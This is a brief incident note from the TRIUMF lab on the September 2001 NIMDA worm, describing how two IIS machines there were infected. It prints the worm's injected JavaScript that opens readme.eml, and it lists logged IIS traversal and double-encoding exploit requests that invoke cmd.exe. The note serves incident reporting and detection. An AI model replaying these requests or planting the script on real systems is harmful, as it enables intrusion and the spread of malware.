The NIMDA worm at TRIUMF

The NIMDA worm appeared on September 18th 2001 and initially spread very rapidly. As a precautionary measure inbound HTTP access to TRIUMF was blocked except to major non-IIS webserver such as www.triumf.ca and admin.triumf.ca. This was relaxed so that 4 known IIS webservers were blocked pending verification, then the block was removed. Unfortunately one IIS webserver had not been properly updated, while another machine thought to have been disabled was also running IIS. These two machines were subsequently infected on the weekend before being detected and cleaned up.

NIDMA appears to propagate via IIS infection (worm) and also via email, and via download from infected websites.

Infected sites will have a script on all Web pages <script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>
This will load a file of type EML on Windows machines which will then propagate the worm.

Worm phase - a number of exploit attempts against NT IIS : 
REQUEST_URI: /c/winnt/system32/cmd.exe?/c+dir
REQUEST_URI: /d/winnt/system32/cmd.exe?/c+dir
REQUEST_URI: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
REQUEST_URI: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
REQUEST_URI: /MSADC/root.exe?/c+dir
REQUEST_URI: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
REQUEST_URI: /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
REQUEST_URI: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
REQUEST_URI: /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
REQUEST_URI: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
REQUEST_URI: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
REQUEST_URI: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
REQUEST_URI: /scripts/root.exe?/c+dir
REQUEST_URI: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

Related Links

Scan rate graphs (Code Red plus Nimda)

A.Daviel